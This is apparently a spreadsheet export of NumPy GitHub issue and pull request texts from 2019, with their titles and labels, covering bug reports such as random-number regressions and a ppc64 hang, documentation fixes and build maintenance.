I am doing single value decomposition._x000D_
The problem is that after doing a matrix multiplication using 8+ eigenvectors, the first column of the multiplication product is different(They should be the same no matter what). Here I am summing the differences to show how much they differ by._x000D_
_x000D_
&lt;img width="654" alt="Screen Shot 2019-09-19 at 3 04 35 PM" src="https://user-images.githubusercontent.com/14355706/65284589-dad56300-daee-11e9-9c18-61e254fed800.png"&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Numerical Error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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Assert that git revision is not missing (as happened in #8512)._x000D_
Parsing the bug (which is old) I don't believe this should ever assert unless in weird situations. _x000D_
_x000D_
I'm also happy if people want to close the bug as obsolete </t>
  </si>
  <si>
    <t>MAINT: handle case where GIT_VERSION is empty string</t>
  </si>
  <si>
    <t>Fixing typo from #10850 _x000D_
_x000D_
I would guess the comment about 1.15 can be updated as well and say it was deprecated in 1.18 as downstream users might not noticed the ImportWarning.</t>
  </si>
  <si>
    <t>Changing ImportWarning to DeprecationWarning</t>
  </si>
  <si>
    <t>There is no versionadded tag for prepend on https://docs.scipy.org/doc/numpy/reference/generated/numpy.diff.html. This is not a huge problem, but I've started using that argument quite a bit more, so it would be nice to know what versions break my code._x000D_
_x000D_
I would be happy to submit a PR, but am not sure what the correct version is (I think it's 1.16.0, but would prefer to have an expert verify).</t>
  </si>
  <si>
    <t>Missing .. versionadded in `prepend` parameter of np.diff</t>
  </si>
  <si>
    <t xml:space="preserve">The example casting function shown in https://numpy.org/devdocs/user/c-info.beyond-basics.html#registering-a-casting-function is not correct C code. </t>
  </si>
  <si>
    <t>DOC: Fix a bit of code in 'Beyond the Basics' C API user guide.</t>
  </si>
  <si>
    <t>Cleanup unused function and tweak order of header include to get a clean build on clang (at least on my machine). I built this on top of #14527 to turn all warnings into errors after the `build_src` configuration step.</t>
  </si>
  <si>
    <t>MAINT: remove unused functions, rearrange headers (from CC=clang)</t>
  </si>
  <si>
    <t xml:space="preserve">Rewrote to recommend that `__array__` be implemented *either* to return an ndarray or raise and Exception._x000D_
_x000D_
See numpy list for some discussion._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Advise implementing  __array__ in duck arrays.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: NEP']</t>
  </si>
  <si>
    <t>Adds the -Werror compiler option to build, build_clib and build_ext sub-commands. Can be used with `CC=clang` to try out the clang compiler and see the errors</t>
  </si>
  <si>
    <t>BLD: add warn-error option,  adds -Werror to  compiler</t>
  </si>
  <si>
    <t>#14514 added a test for building towncrier notes. For some reason the test passed in the merge even though it left master with a bad file name?</t>
  </si>
  <si>
    <t>BUG: fix release snippet failures caught only after merging</t>
  </si>
  <si>
    <t>There are occasional hangs on the CI runs with PyPy. Adding `-v` to try to pinpoint which test sequences hang. Also noticed a resource leak.</t>
  </si>
  <si>
    <t>BUILD, MAINT: run tests with verbose for PyPY, also do not leak resource</t>
  </si>
  <si>
    <t>['03 - Maintenance', '24 - PyPy', 'component: build']</t>
  </si>
  <si>
    <t>Some trivial clean up.  Found these duplicate prototypes while investigating a different issue.</t>
  </si>
  <si>
    <t>MAINT: random: Remove a few duplicated C function prototypes.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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import numpy as np_x000D_
np.random.seed(42)_x000D_
_x000D_
np.random.binomial(1, np.linspace(0, 1, 1000), 1000).sum()_x000D_
```_x000D_
_x000D_
produces `515` on version 1.16.3 and `514` on version 1.17.0+_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
```_x000D_
1.16.3 3.7.3 (default, Mar 26 2019, 21:43:19)_x000D_
[GCC 8.2.1 20181127]_x000D_
```_x000D_
_x000D_
and _x000D_
_x000D_
```_x000D_
1.17.2 3.7.3 (default, Mar 26 2019, 21:43:19)_x000D_
[GCC 8.2.1 20181127]_x000D_
```_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.random.binomial produces inconsistent output with same seed in 1.16 -&gt; 1.17</t>
  </si>
  <si>
    <t xml:space="preserve">DOC:_x000D_
_x000D_
Mention that split() returns views into the original array._x000D_
_x000D_
Also combines the last two lines of the method into one, as an unnecessary variable was created for the result which is not needed._x000D_
_x000D_
Closes #14491._x000D_
</t>
  </si>
  <si>
    <t>Mention that split() returns views into the original array</t>
  </si>
  <si>
    <t>Replace `entropy` with `SeedSequence` and remove the module. _x000D_
_x000D_
xref gh-14359_x000D_
_x000D_
release note needed, but cannot create until the PR is opened</t>
  </si>
  <si>
    <t>MAINT: remove the entropy c-extension module</t>
  </si>
  <si>
    <t>As requested in #14470, this adds a `--debug-configure` option to `runtests.py` and `setup.py build` to hide all the compiler output during the configuration probe to create `config.h` and `_numpyconfig.h`._x000D_
_x000D_
This also converts some of the direct `print` to stdout so that it uses the logger instead. The lack of the flag simply raises the log level to `WARN` from `INFO` for the duration of the noisy function.</t>
  </si>
  <si>
    <t>BUILD: Hide platform configuration probe behind --debug-configure</t>
  </si>
  <si>
    <t xml:space="preserve">Fix randint to use 32-bit path when range is exactly 2**32_x000D_
_x000D_
closes #14189_x000D_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</si>
  <si>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randint when range is 2**32</t>
  </si>
  <si>
    <t>For the moment, this requires te use for the development version_x000D_
of towncrier._x000D_
_x000D_
---_x000D_
_x000D_
I will check CI, there are likely smaller things that needs fixing in existing fragments, if not, I may just merge soon, so that the fragments are tested (at least for rst errors).</t>
  </si>
  <si>
    <t>DOC: Build release notes during CircleCI step</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: CI']</t>
  </si>
  <si>
    <t>This gives some fixups, at least the resize, reduceat, and sorting valbuffer (introduced recently, although not sure how buggy it was before) are actual bugs._x000D_
_x000D_
---_x000D_
_x000D_
I have a bunch of changes adding `NPY_UNUSED` in many places, and `const`, but they are neither quite complete, nor am I sure it is worth the trouble at this time.</t>
  </si>
  <si>
    <t>BUG,MAINT: Some fixes and minor cleanup based on clang analysis</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance']</t>
  </si>
  <si>
    <t>Addresses part of gh-14359_x000D_
_x000D_
**TODO / to decide**: there's still two namespaces left that look private:_x000D_
_x000D_
- numpy.random.entropy (contains `random_entropy` and `seed_by_array`, unclear if those need to be public)_x000D_
- numpy.random.bit_generator (contains only `BitGenerator` as a public object I think)</t>
  </si>
  <si>
    <t>DOC: random: fix doc linking, was referencing private submodules.</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">This affects the behavior of merge_arrays._x000D_
_x000D_
Revived from my stash thanks to @ahaldane fixing structured equality_x000D_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</si>
  <si>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flatten_dtype so that nested 0-field structs are flattened correctly</t>
  </si>
  <si>
    <t>This return value was not documented and did not make any sense. There's no reason to have a special case here.</t>
  </si>
  <si>
    <t>API: Do not return None from recfunctions.drop_fields</t>
  </si>
  <si>
    <t>['30 - API', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14464. _x000D_
_x000D_
This fixes a regression in boolean matmul where booleans were being_x000D_
handled as integers rather than booleans. In addition, this backports_x000D_
matmul support for object arrays._x000D_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</si>
  <si>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regression in boolean matmul.</t>
  </si>
  <si>
    <t>MAINT: Update pytest version for Python 3.8</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14464. _x000D_
_x000D_
Fixes gh-14439_x000D_
_x000D_
Not sure whether this should be labelled a bug or a regression, since the original matmul was based on dot and so most likely worked properly. If a regression the test should move to the proper place._x000D_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</si>
  <si>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add a specialized loop for boolean matmul.</t>
  </si>
  <si>
    <t>Clarifies the docstring based on this discussion_x000D_
https://mail.python.org/pipermail/numpy-discussion/2019-September/080034.html_x000D_
https://mail.python.org/pipermail/numpy-discussion/2019-September/080044.html_x000D_
_x000D_
To summarize, the behavior:_x000D_
```python_x000D_
&gt;&gt;&gt; np.round(16.055, 2), round(16.055, 2)  # equals 16.0549999999999997_x000D_
(16.06, 16.05)_x000D_
```_x000D_
shows that floating-point error occurs for small values, not just large values like the `np.round` docstring says._x000D_
_x000D_
_x000D_
So this PR removes the red-herring comment about large values.</t>
  </si>
  <si>
    <t>DOC: tweak np.round docstring to clarify floating-point error</t>
  </si>
  <si>
    <t xml:space="preserve">Reverts gh-14458 and instead fixes the actual incorrect code._x000D_
_x000D_
This fixes a regression in 1.17 and does not result in a change in behavior of the legacy random code._x000D_
</t>
  </si>
  <si>
    <t>BUG: random: Revert gh-14458 and refix gh-14557.</t>
  </si>
  <si>
    <t>DOC: Fix a minor typo in changelog readme</t>
  </si>
  <si>
    <t>Currently the function is not properly rendered in the sphinx documentation (the function after https://docs.scipy.org/doc/numpy/reference/c-api.ufunc.html#c.PyUFunc_FromFuncAndDataAndSignature). By adding the backslashes sphinx will realize that the signature extends over multiple lines.</t>
  </si>
  <si>
    <t>DOC: Add backslashes so PyUFunc_FromFuncAndDataAndSignatureAndIdentity renders correctly with sphinx.</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', 'component: Documentation']</t>
  </si>
  <si>
    <t>Allow overriding npy-pkg-config directory using the NPY_PKG_CONFIG_PATH_x000D_
environment variable, making it easier to use numpy in cross-compilation_x000D_
setups._x000D_
_x000D_
With this in place, you can arrange for cross-compilation npy-pkg-config files in an alternative_x000D_
location, and use that instead of the host versions when cross compiling.</t>
  </si>
  <si>
    <t>ENH: Allow NPY_PKG_CONFIG_PATH environment variable override</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: build', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>The documentation isn't creating a link (https://docs.scipy.org/doc/numpy/reference/c-api.array.html#c.PyArray_NewFromDescr) because the documented member is called `NPY_ARRAY_OWNDATA` (https://docs.scipy.org/doc/numpy/reference/c-api.array.html#c.NPY_ARRAY_OWNDATA)</t>
  </si>
  <si>
    <t>DOC: Fix reference NPY_ARRAY_OWNDATA instead of NPY_OWNDATA.</t>
  </si>
  <si>
    <t>It should be documented whether `numpy.split()` works in place or not. I think it does not, but in general that information is probably easy to add for you maintainers._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.17.0 3.6.8 (default, Jan 14 2019, 11:02:34) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]</t>
  </si>
  <si>
    <t>Document whether numpy.split() works in place</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Platform: AIX_x000D_
Version: 7.1_x000D_
Python 3.6.5 from Bulls' Freeware_x000D_
pip 19.2.3 from /opt/freeware/lib/python3.6/site-packages/pip (python 3.6)_x000D_
numpy                  1.17.2_x000D_
_x000D_
Issue: Numpy installs but does not import._x000D_
Error on import:_x000D_
Original error was: Could not load module /opt/freeware/lib64/python3.6/site-packages/numpy/core/_multiarray_umath.so._x000D_
        The local-exec model was used for thread-local_x000D_
           storage, but the module is not the main program._x000D_
Examine the .loader section header with the 'dump -Hv' command._x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
### Error message:_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
Traceback (most recent call last):_x000D_
  File "/opt/freeware/lib64/python3.6/site-packages/numpy/core/__init__.py", line 17, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/opt/freeware/lib64/python3.6/site-packages/numpy/core/multiarray.py", line 14, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/opt/freeware/lib64/python3.6/site-packages/numpy/core/overrides.py", line 7, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: Could not load module /opt/freeware/lib64/python3.6/site-packages/numpy/core/_multiarray_umath.so._x000D_
        The local-exec model was used for thread-local_x000D_
           storage, but the module is not the main program._x000D_
Examine the .loader section header with the 'dump -Hv' command._x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/opt/freeware/lib64/python3.6/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/opt/freeware/lib64/python3.6/site-packages/numpy/core/__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
_x000D_
IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
_x000D_
Importing the numpy c-extensions failed._x000D_
- Try uninstalling and reinstalling numpy._x000D_
- If you have already done that, then:_x000D_
  1. Check that you expected to use Python3.6 from "/usr/bin/python",_x000D_
     and that you have no directories in your PATH or PYTHONPATH that can_x000D_
     interfere with the Python and numpy version "1.17.2"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 If you're working with a numpy git repository, try `git clean -xdf`_x000D_
  (removes all files not under version control) and rebuild numpy._x000D_
_x000D_
Note: this error has many possible causes, so please don't comment on_x000D_
an existing issue about this - open a new one instead._x000D_
_x000D_
Original error was: Could not load module /opt/freeware/lib64/python3.6/site-packages/numpy/core/_multiarray_umath.so._x000D_
        The local-exec model was used for thread-local_x000D_
           storage, but the module is not the main program._x000D_
Examine the .loader section header with the 'dump -Hv' command._x000D_
_x000D_
&gt;&gt;&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUILD: missing -fPIC on AIX</t>
  </si>
  <si>
    <t xml:space="preserve">I noticed this when I got a warning while using numpy.distutils.  The printed output was not terminated with a newline, so after running setup.py, the shell prompt ended up at the end of the printed warning instead of in a new line.  For example, the following shows the last few lines of output when I ran setup.py in the directory `~/repos/git/sources/numtypes`.  Note that the shell prompt `~/repos/git/sources/numtypes$` ends up tacked on to the warning instead of in a new line:_x000D_
_x000D_
```_x000D_
[...]_x000D_
running install_clib_x000D_
customize UnixCCompiler_x000D_
Warning: Assuming default configuration (numtypes/{setup_numtypes,setup}.py was not found)~/repos/git/sources/numtypes$_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>MAINT: distutils: Add newline at the end of printed warnings.</t>
  </si>
  <si>
    <t>Just a few warnings less on my gcc (debug) build at leas (was annoying me while writing larger amounts of new code and trying to find the relevant actual warnings)</t>
  </si>
  <si>
    <t>MAINT: Silence integer comparison build warnings in assert statements</t>
  </si>
  <si>
    <t>I am not sure how much build noise it actually reduces, I skipped a few files (dtype transfer) where there are just a huge amount of unused parameters. So this is basically a start, but am happy to fix it up if others feel it is nice. I see these in the IDE now, I guess at least the NPY_UNUSUED ones show up when compiling with clang?</t>
  </si>
  <si>
    <t>MAINT: Add `NPY_UNUSED` and `const` qualified suggested by clang</t>
  </si>
  <si>
    <t>Some minor cleanup that makes the error handling path take up less space in the main flow._x000D_
_x000D_
This also fails in a slightly more sensible way if somehow other stuff goes wrong while trying to produce the error message.</t>
  </si>
  <si>
    <t>MAINT: Extract raising of MemoryError to a helper function</t>
  </si>
  <si>
    <t xml:space="preserve">Fix the function pyrational_str to return a Unicode string._x000D_
_x000D_
Before this change:_x000D_
_x000D_
    &gt;&gt;&gt; r = _rational_tests.rational(17, 5)_x000D_
    &gt;&gt;&gt; r_x000D_
    rational(17,5)_x000D_
    &gt;&gt;&gt; str(r)_x000D_
    Traceback (most recent call last):_x000D_
      File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
    TypeError: __str__ returned non-string (type bytes)_x000D_
_x000D_
After this change:_x000D_
_x000D_
    &gt;&gt;&gt; r = _rational_tests.rational(17, 5)_x000D_
    &gt;&gt;&gt; r_x000D_
    rational(17,5)_x000D_
    &gt;&gt;&gt; str(r)_x000D_
    '17/5'_x000D_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</si>
  <si>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core: Fix the str function of the rational dtype.</t>
  </si>
  <si>
    <t>Add a parser that under "normal development" workflow (on linux, using gcc, without `--show-build`) will raise an error if warnings are emitted during `run_tests.py`_x000D_
_x000D_
I have been bitten by this many times, where I miss the warnings since I do not by default look at the `build.log`. This works for me (I caused a warning to be emitted and indeed `runtests.py` fails._x000D_
_x000D_
How much further should I pursue this: adding support for clang, windows, using `--show-build` ?</t>
  </si>
  <si>
    <t>BLD: Add a best-effort build.log parser that looks for warnings</t>
  </si>
  <si>
    <t>In _ctypes class, ctypes.cast() was called twice. It causes circular reference_x000D_
for _ctypes._data due to the CPython bug https://bugs.python.org/issue12836._x000D_
This bug of ctypes.cast() seems affecting all Python versions._x000D_
It can be verified with the code below._x000D_
```python_x000D_
from sys import getrefcount_x000D_
import ctypes_x000D_
_x000D_
z = ctypes.c_int(1)_x000D_
pc = ctypes.cast(ctypes.byref(z), ctypes.c_char_p)_x000D_
print(getrefcount(pc))  # 2: from getrefcount()_x000D_
pv = ctypes.cast(pc, ctypes.c_void_p)_x000D_
print(getrefcount(pc))  # 3: from getrefcount(), pc._objects; circular ref: pc -&gt; pc._objects -&gt; pc!_x000D_
_objects = pc._objects_x000D_
print(_objects == pv._objects)_x000D_
print(getrefcount(_objects))  # 4: from getrefcount(), _objects, pc._objects, pv._objects_x000D_
pc = pv = None_x000D_
print(getrefcount(_objects))  # 3: from getrefcount(), _objects; circular ref: _objects -&gt; pc -&gt; pc._objects!_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Fix _ctypes class circular reference. (#13808)</t>
  </si>
  <si>
    <t>['00 - Bug', '09 - Backport-Candidate', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">The [documentation](https://docs.scipy.org/doc/numpy/reference/generated/numpy.sinc.html#numpy.sinc) currently states:_x000D_
_x000D_
&gt; It works in 2-D as well:_x000D_
&gt; &gt;&gt;&gt; x = np.linspace(-4, 4, 401)_x000D_
&gt; &gt;&gt;&gt; xx = np.outer(x, x)_x000D_
&gt; &gt;&gt;&gt; plt.imshow(np.sinc(xx))_x000D_
_x000D_
This does not seem useful as it is computing np.sinc(x*y) over the domain [-4,4]*[-4,4]._x000D_
_x000D_
In almost all cases, the desired generalization of np.sinc() to 2D is instead np.sinc(x)*np.sinc(y) [see [Wikipedia entry](https://en.wikipedia.org/wiki/Sinc_function#Higher_dimensions)]:_x000D_
_x000D_
  xx, yy = np.meshgrid(np.linspace(-4, 4, 401), np.linspace(-4, 4, 401))_x000D_
  plt.imshow(np.sinc(xx) * np.sinc(yy), cmap='gray')_x000D_
</t>
  </si>
  <si>
    <t>np.sinc() documentation "It works in 2-D as well" looks misleading</t>
  </si>
  <si>
    <t xml:space="preserve">* The comment about casting to long is no longer relevant._x000D_
* The conversion of the arrays to int64 immediately before calling_x000D_
  `discrete_broadcast_iii` is no longer necessary, because they are_x000D_
  created as int64 arrays._x000D_
</t>
  </si>
  <si>
    <t>MAINT: random: Follow-up to PR 14458.</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes gh-14439_x000D_
_x000D_
Not sure whether this should be labelled a bug or a regression, since the original matmul was based on dot and so most likely worked properly. If a regression the test should move to the proper place._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: add a specialized loop for boolean matmul</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14458. _x000D_
_x000D_
Fixes #14457_x000D_
_x000D_
This caused a incorrect `int64*` pointer-dereference to an `int32` array in 32-bit mode where `npy_long` is not `npy_int64`._x000D_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</si>
  <si>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random.hypergeometic assumes npy_long is npy_int64, hung ppc64</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.random']</t>
  </si>
  <si>
    <t>In #14378 we added a test_requirements.txt file, but as shown in #14440 I missed using it in the shippable CI configuration and for the tox configuration. In order for tox to use it, we must ship it (put it in `MANIFEST.in`), which is a good idea anyway._x000D_
_x000D_
Also refactored the `includes` in the `MANIFEST.in`</t>
  </si>
  <si>
    <t>MAINT: use test_requirements.txt in tox and shippable, ship it too</t>
  </si>
  <si>
    <t>Possibly overkill on the formatting, depending on how friendly we want this message to be.</t>
  </si>
  <si>
    <t>ENH: Print the amount of memory that would be used by a failed allocation</t>
  </si>
  <si>
    <t>Fixes #14457_x000D_
_x000D_
This caused a incorrect `int64*` pointer-dereference to an `int32` array in 32-bit mode where `npy_long` is not `npy_int64`.</t>
  </si>
  <si>
    <t>BUG: random.hypergeometic assumes npy_long is npy_int64, hangs ppc64</t>
  </si>
  <si>
    <t xml:space="preserve">Running the following command on ppc64(be) hangs due to a near-infinite loop:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.random.hypergeometric([1,2,2], [2], [2])_x000D_
```_x000D_
_x000D_
Appears to be related to new code in #13761, perhaps @WarrenWeckesser has an idea. See in particular frame #2 below. It appears a value is negative but the code expects it not to be._x000D_
_x000D_
gdb stack trace after breaking during hang:_x000D_
```_x000D_
#0  __log (x=-25811282) at ../math/w_log.c:27_x000D_
#1  0x0ea14754 in loggam (x=-160848451)_x000D_
    at numpy/random/src/distributions/distributions.c:503_x000D_
#2  0x0ea1232c in random_hypergeometric_hrua (bitgen_state=0xf76272c8, good=1, _x000D_
    bad=2, sample=268080756)_x000D_
    at numpy/random/src/legacy/legacy-distributions.c:266_x000D_
#3  0x0ea12798 in random_hypergeometric_original (bitgen_state=0xf76272c8, _x000D_
    good=1, bad=2, sample=268080756)_x000D_
    at numpy/random/src/legacy/legacy-distributions.c:315_x000D_
#4  0x0ea12844 in legacy_random_hypergeometric (bitgen_state=0xf76272c8, _x000D_
    good=1, bad=2, sample=8858015348)_x000D_
    at numpy/random/src/legacy/legacy-distributions.c:334_x000D_
#5  0x0e96db10 in __pyx_f_5numpy_6random_6common_discrete_broadcast_iii (_x000D_
    __pyx_v_func=0xea127e8 &lt;legacy_random_hypergeometric&gt;, _x000D_
    __pyx_v_state=0xf76272c8, __pyx_v_size=0x104520e0 &lt;_Py_NoneStruct&gt;, _x000D_
    __pyx_v_lock=0xf7647140, __pyx_v_a_arr=0xf754c638, _x000D_
    __pyx_v_a_name=0xf7643fa0, _x000D_
    __pyx_v_a_constraint=__pyx_e_5numpy_6random_6common_CONS_NON_NEGATIVE, _x000D_
    __pyx_v_b_arr=0xf754c570, __pyx_v_b_name=0xf7643f80, _x000D_
    __pyx_v_b_constraint=__pyx_e_5numpy_6random_6common_CONS_NON_NEGATIVE, _x000D_
    __pyx_v_c_arr=0xf754c548, __pyx_v_c_name=0xf7643fe0, _x000D_
    __pyx_v_c_constraint=__pyx_e_5numpy_6random_6common_CONS_GTE_1)_x000D_
    at numpy/random/common.c:13924_x000D_
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---frame 1_x000D_
#6  0x0e9e7c5c in __pyx_pf_5numpy_6random_6mtrand_11RandomState_96hypergeometric (__pyx_v_self=0xf76272b8, __pyx_v_ngood=0xf7551058, __pyx_v_nbad=0xf754ffa8, _x000D_
    __pyx_v_nsample=0xf754fe68, __pyx_v_size=0x104520e0 &lt;_Py_NoneStruct&gt;)_x000D_
    at numpy/random/mtrand.c:15834_x000D_
#7  0x0e9e536c in __pyx_pw_5numpy_6random_6mtrand_11RandomState_97hypergeometric (__pyx_v_self=0xf76272b8, __pyx_args=0xf7535b48, __pyx_kwds=0x0)_x000D_
    at numpy/random/mtrand.c:15312_x000D_
#8  0x1006ca2c in PyCFunction_Call ()_x000D_
```_x000D_
_x000D_
A little bit of gdb exploration so far:_x000D_
```_x000D_
(gdb) frame 1_x000D_
#1  0x0ea14754 in loggam (x=-160848451)_x000D_
    at numpy/random/src/distributions/distributions.c:503_x000D_
(gdb) p n_x000D_
$2 = 160848458_x000D_
(gdb) p x_x000D_
$3 = -160848451_x000D_
(gdb) frame 2_x000D_
#2  0x0ea1232c in random_hypergeometric_hrua (bitgen_state=0xf76272c8, good=1, _x000D_
    bad=2, sample=268080756)_x000D_
    at numpy/random/src/legacy/legacy-distributions.c:266_x000D_
266	  d10 = (loggam(d9 + 1) + loggam(mingoodbad - d9 + 1) + loggam(m - d9 + 1) +_x000D_
(gdb) l_x000D_
261	  d5 = 1.0 - d4;_x000D_
262	  d6 = m * d4 + 0.5;_x000D_
263	  d7 = sqrt((double)(popsize - m) * sample * d4 * d5 / (popsize - 1) + 0.5);_x000D_
264	  d8 = D1 * d7 + D2;_x000D_
265	  d9 = (RAND_INT_TYPE)floor((double)(m + 1) * (mingoodbad + 1) / (popsize + 2));_x000D_
266	  d10 = (loggam(d9 + 1) + loggam(mingoodbad - d9 + 1) + loggam(m - d9 + 1) +_x000D_
267	         loggam(maxgoodbad - m + d9 + 1));_x000D_
268	  d11 = MIN(MIN(m, mingoodbad) + 1.0, floor(d6 + 16 * d7));_x000D_
269	  /* 16 for 16-decimal-digit precision in D1 and D2 */_x000D_
270	_x000D_
(gdb) p d9_x000D_
$4 = -107232301_x000D_
```_x000D_
_x000D_
The failing line 266 in the last bit of code is from #13761, but I haven't read it well enough yet to know what it should do._x000D_
</t>
  </si>
  <si>
    <t>near-infinite loop on ppc64 in np.random.hypergeometric</t>
  </si>
  <si>
    <t>['00 - Bug', '09 - Backport-Candidate']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14452. _x000D_
_x000D_
Follow-up to https://github.com/numpy/numpy/pull/14436#issuecomment-528672347_x000D_
_x000D_
- `pocketfft.py` --&gt; `_pocketfft.py`_x000D_
- `pocketfft.c` --&gt; `_pocketfft.c`_x000D_
- `pocketfft_internal.so` --&gt; `_pocketfft_internal.so`_x000D_
_x000D_
Also get rid of an old-style `info.py` file with just a module docstring in it._x000D_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</si>
  <si>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clean up pocketfft modules inside numpy.fft namespace.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '08 - Backport', 'component: numpy.fft']</t>
  </si>
  <si>
    <t>There is more work to do (added a FIXME), but that's for another time. Preventing to add new submodules is a good start. Also added some documentation, and split things into public and private submodules with comments._x000D_
_x000D_
The change to `numpy.lib.mixins.__all__` shows that people have been working around our `import *` mess sometimes. Not adding some public object to an `__all__` dict is incorrect of course - need a more structural fix by getting rid of `*` imports.</t>
  </si>
  <si>
    <t>MAINT: add test to prevent new public-looking modules being added</t>
  </si>
  <si>
    <t>['05 - Testing', '30 - API', '62 - Python API changes']</t>
  </si>
  <si>
    <t>Rationale: it has happened multiple times in the recent past that users_x000D_
needed to use a more recent Cython than was used to generate the sdist_x000D_
of the most recent release available on PyPI (e.g. for building with_x000D_
a not-yet-released version of Python for which a Cython fix just_x000D_
landed).  The dependency specification and packaging tools have matured_x000D_
to the point where it should be fine to require Cython to be installed._x000D_
Also, we have wheels (and conda-forge packages) for Windows, Linux and_x000D_
macOS, so this change won't be visible at all to the average user._x000D_
_x000D_
Closes gh-13790, closes gh-14403_x000D_
_x000D_
Also adds `pyproject.toml` to `MANIFEST.in`, it was missing._x000D_
_x000D_
Another note: this is not in `setup_requires` on purpose. For one because `generate_cython` runs before `setup(**metadata)` is invoked. For another, because if anyone runs `python setup.py install` they can simply deal with any error if they get it. And using `setup_requires` would invoke `easy_install` in some cases, which isn't nice anyway.</t>
  </si>
  <si>
    <t>BLD: remove generated Cython files from sdist</t>
  </si>
  <si>
    <t>['component: distribution']</t>
  </si>
  <si>
    <t xml:space="preserve">Follow-up to https://github.com/numpy/numpy/pull/14436#issuecomment-528672347_x000D_
_x000D_
- `pocketfft.py` --&gt; `_pocketfft.py`_x000D_
- `pocketfft.c` --&gt; `_pocketfft.c`_x000D_
- `pocketfft_internal.so` --&gt; `_pocketfft_internal.so`_x000D_
_x000D_
Also get rid of an old-style `info.py` file with just a module docstring in it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: clean up pocketfft modules inside numpy.fft namespace</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.fft']</t>
  </si>
  <si>
    <t>Hello,_x000D_
while preparing numpy 1.16.5 package for Debian, the build process failed when running tests with this error:_x000D_
_x000D_
```_x000D_
NumPy version 1.16.5_x000D_
NumPy relaxed strides checking option: True_x000D_
============================= test session starts ==============================_x000D_
platform linux2 -- Python 2.7.16+, pytest-4.6.5, py-1.8.0, pluggy-0.12.0 -- /usr/bin/python2.7_x000D_
cachedir: .pytest_cache_x000D_
rootdir: /build/python-numpy-1.16.5, inifile: pytest.ini_x000D_
collecting ... collected 7521 items / 166 deselected / 7355 selected_x000D_
_x000D_
...._x000D_
_x000D_
tmp/usr/lib/python2.7/dist-packages/numpy/core/tests/test_indexing.py::TestIndexing::test_single_int_index PASSED [ 10%]_x000D_
tmp/usr/lib/python2.7/dist-packages/numpy/core/tests/test_indexing.py::TestIndexing::test_single_bool_index PASSED [ 10%]_x000D_
tmp/usr/lib/python2.7/dist-packages/numpy/core/tests/test_indexing.py::TestIndexing::test_boolean_shape_mismatch Segmentation fault_x000D_
```_x000D_
_x000D_
i tried twice and the tests always failed on that specific test. This is for python 2.7.16. Let me know if i can help you debug the issue further (if it helps, i'm on an amd64 machine)_x000D_
_x000D_
Regards,_x000D_
Sandro</t>
  </si>
  <si>
    <t>numpy 1.16.5: numpy/core/tests/test_indexing.py::TestIndexing::test_boolean_shape_mismatch Segmentation fault</t>
  </si>
  <si>
    <t xml:space="preserve">- Add 1.17.2-changelog.rst_x000D_
- Add 1.17.2-notes.rst_x000D_
- Update release.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Update master after 1.17.2 release.</t>
  </si>
  <si>
    <t>['04 - Documentation', '14 - Release', 'component: Documentation']</t>
  </si>
  <si>
    <t>This is to clarify and make consistent some of the language in NEP 29._x000D_
